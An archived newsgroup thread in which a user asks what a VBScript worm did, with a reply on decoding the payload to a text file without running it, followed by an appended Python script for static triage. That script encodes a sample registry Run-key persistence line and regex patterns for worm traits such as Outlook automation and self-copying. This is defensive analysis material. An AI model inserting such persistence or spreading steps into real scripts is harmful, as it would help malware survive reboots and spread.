what did this do? 

Trying to decode this causes NAV to trigger a "Bloodhound alert" for "Bloodhound.VBS.Worm"...

SARC Write-up - Bloodhound
http://www.*-*-*.com/ Bloodhound.html

--
Michael Harris
Microsoft.MVP.Scripting
--

Please do not email questions - post them to the newsgroup instead.
--



Tue, 11 Nov 2003 09:15:20 GMT  
 what did this do?
Modifying the script as follows:

' Write the decoded script to a text file instead of letting document.write run it
set fso = createobject("scripting.filesystemobject")
set myFile = fso.createTextFile("C:\virus.txt")
' The string is the unescape() argument from the original post; each wrapped line
' ends in " & _ (quote, ampersand, underscore) so VBScript treats it as one literal
myFile.write(unescape("%0D%0A%3CSCRIPT%20LANGUAGE%20%3D%20%22VBScript%2" & _
. . .
"D%0A//--%3E%3C/SCRIPT%3E%0D%0A%0D%0A%0D%0A%09"))
myFile.close
set myFile = nothing
set fso = nothing

will write the actual executed code to a text file (C:\virus.txt), and you
can see what it does there.  It's quite {*filter*}, but I don't know how it would
compare with other viruses.  Note that for the script above to work, you'd
need to replace all the ='s in the big long string with " & _  (a quote, an
ampersand, an underscore).  Then save it as a .vbs file and run it.  You
won't be infected by running it modified as I've instructed.  I ran it and
made sure it worked safely on my computer, but I don't think Microsoft would
want us posting the code for a virus . . .

I don't know anything about what the AntiVirus people say about it, but this
will tell you what it does.

Robert Dunn


Quote:
> I got infected by some VBS virus from a newsgroup post I downloaded.  Here
> is the script, can someone tell me what damage it did?




Wed, 10 Dec 2003 03:23:19 GMT  
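The same decode-don't-run approach as Robert Dunn's .vbs, done statically in Python (an added example, not code from the thread): join the "=" soft line breaks the news client inserted, percent-decode the unescape() argument, and list the Windows Script Host calls a defender would want to see. The sample post, the indicator names and the js_unescape helper are constructed for this example; the API names flagged (RegWrite to a Run key, Outlook.Application, WScript.ScriptFullName, .Copy) are the ones the quoted worm uses.

```python
import re
from urllib.parse import unquote

# Constructed sample, not the worm from the post: a two-line VBScript fragment,
# percent-encoded and wrapped with "=" soft line breaks as the quoted post shows.
SAMPLE_POST = (
    'document.write(unescape("%0D%0ASet%20ws%20%3D%20CreateObject%28%22WScri=\n'
    'pt.Shell%22%29%0D%0Aws.RegWrite%20%22HKEY_LOCAL_MACHINE%5CSoftware%5CMi=\n'
    'crosoft%5CWindows%5CCurrentVersion%5CRun%5CSearchMSN%22%2C%20%22C%3A%5C=\n'
    'SearchMSN.vbs%22%0D%0A"))'
)

# Calls worth flagging in a decoded WSH script; the indicator labels are ours.
SUSPICIOUS = {
    "run_key_persistence": re.compile(r'RegWrite\s+"HK[^"]*\\Run\\', re.I),
    "outlook_automation": re.compile(r'CreateObject\(\s*"Outlook\.Application"', re.I),
    "self_copy": re.compile(r"WScript\.ScriptFullName|\.Copy\s*\(", re.I),
    "shell_object": re.compile(r'CreateObject\(\s*"WScript\.Shell"', re.I),
}

def join_soft_breaks(text: str) -> str:
    """Undo quoted-printable soft line breaks ("=" before a newline); the manual "replace the ='s" step."""
    return re.sub(r"=\r?\n", "", text)

def js_unescape(s: str) -> str:
    """Mimic JavaScript unescape(): %uXXXX is a UTF-16 code unit, %XX a Latin-1 byte (not UTF-8)."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def extract_payload(post: str) -> str:
    """Decode the literal inside document.write(unescape("...")) without evaluating anything."""
    m = re.search(r'unescape\("([^"]*)"\)', join_soft_breaks(post))
    if not m:
        raise ValueError('no unescape("...") literal found')
    return js_unescape(m.group(1))

def triage(script: str) -> dict:
    """Map each indicator name to the decoded lines that trigger it."""
    hits = {}
    for line in script.splitlines():
        for name, pat in SUSPICIOUS.items():
            if pat.search(line):
                hits.setdefault(name, []).append(line.strip())
    return hits

if __name__ == "__main__":
    decoded = extract_payload(SAMPLE_POST)
    for name, lines in triage(decoded).items():
        print(name, "->", lines)
```

Nothing is executed: the decoded text is only searched, so the same script can be pointed at a saved message body to see what a posted payload would have done.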